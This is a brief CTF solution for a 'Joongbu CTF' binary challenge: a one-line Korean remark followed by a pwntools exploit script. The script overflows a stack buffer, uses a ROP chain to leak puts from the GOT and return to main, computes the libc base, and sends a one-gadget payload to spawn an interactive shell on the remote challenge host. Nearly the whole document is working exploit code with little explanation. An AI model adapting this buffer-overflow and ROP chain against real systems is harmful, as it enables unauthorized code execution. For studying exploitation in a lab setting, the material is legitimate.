Ret2main 후 ROP 수행하면 된다.

from pwn import *
import sys

if sys.argv[1] == "r":
    r = remote('44.210.9.208',10016)
elif sys.argv[1] == "l":
    r = process('./challenge')
    context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(r,'''b*main+324''')

e = ELF('./challenge')
libc = e.libc
context.log_level = 'debug'

def slog(name,addr): return success(": ".join([name,hex(addr)]))

puts_got = e.got['puts']
puts_plt = e.plt['puts']

system_got = e.got['system']
system_plt = e.plt['system']

pop_rdi_ret = 0x00000000004013d3
pop_rsi_r15_ret = 0x00000000004013d1
ret =0x000000000040101a

offset = 80
payload = b'Give me the flag' + b'\\x00'
payload += b'A' * (offset - len(payload)) + b'B' * 8 + p64(ret)
payload += p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)
payload += p64(e.symbols['main'])

r.sendlineafter(b"Welcome to the Joongbu CTF!!", payload)
r.recvuntil(b"That's not possible haha\\n")

puts = u64(r.recv(6).ljust(8,b'\\x00'))
libc_base = puts - libc.symbols['puts']
oneshot = libc_base + 0xe3b01

shell_payload = b'Give me the flag' + b'\\x00'
shell_payload += b'A' * (offset - len(shell_payload)) + b'B' * 8 + p64(ret)
shell_payload += p64(oneshot)

r.sendlineafter(b"Welcome to the Joongbu CTF!!", shell_payload)

r.interactive()